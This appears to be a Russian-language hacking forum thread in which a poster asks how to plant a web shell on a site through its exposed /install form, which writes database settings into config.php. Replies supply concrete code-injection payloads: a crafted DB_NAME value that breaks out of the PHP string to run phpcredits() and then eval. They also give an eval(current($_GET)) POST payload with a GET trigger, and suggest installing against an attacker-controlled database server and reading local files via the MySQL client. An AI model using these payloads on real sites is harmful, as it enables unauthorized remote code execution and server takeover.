Добрый день! Есть сайт, у него есть директория /install где я могу изменять: Имя БД Имя юзера пасс хост Все это соотвественно сохраняется в конфиг.php такого вида: PHP: <?phpreturn array( 'DB_TYPE'=>'mysql', 'DB_HOST'=>'localhost', 'DB_NAME'=>'bdname', 'DB_USER'=>'root', 'DB_PWD'=>'root', 'DB_PORT'=>'3306', 'DB_PREFIX'=>'ez_', 'SHOW_ERROR_MSG' => true,);?> Можно ли как-то заинклудить своя Шелл в этот конфиг через форму в /install и потом запустить сам Config.php со своим шеллом?
Если конфиг точно пишется в файл, то можно попробовать записать DB_NAME так: PHP: '.phpcredits(),// Если при обращении к конфигу выведется phpcredits, то можно заменить его на eval. Но скорее всего кавычка будет эскейпиться. Может писать все креды. Поэтому есть смысл пробовать вариант инсталла на удалённый сервер. И чтение локальных файлов на мускул клиенте, если пых старенький.
Не мне тебя учить, что можно и без кавычки обойтись. Поэтому просто дополню: Вариантов куча, один из. Например постом отправляем Code: cmd=print(eval(current($_GET)));print(____);die; А в гет Code: /index.php?anyname=phpcredits();
Скорее всего нужно Так как вижу только один вариант, и тот, только в "благоприятных" условиях возможен: PHP: <?phpreturn array( 'DB_TYPE'=>'mysql', 'DB_HOST'=>'localhost', 'DB_NAME'=>''.phpcredits(),//', 'DB_USER'=>'root', 'DB_PWD'=>'root', 'DB_PORT'=>'3306', 'DB_PREFIX'=>'ez_', 'SHOW_ERROR_MSG' => true,);?> В качестве альтернативы предложил ещё пару вариантов. Из которых, инсталл базы на подконтрольный сервер, с последующей эксплуатацией через данные поступающие из БД, кажется самым реальным из всех. Есть варианты когда тыкать не нужно?
ну. там что в водил, что получалось, куда в водил, вообщем когда есть вся информация. Тогда можно и не тыкать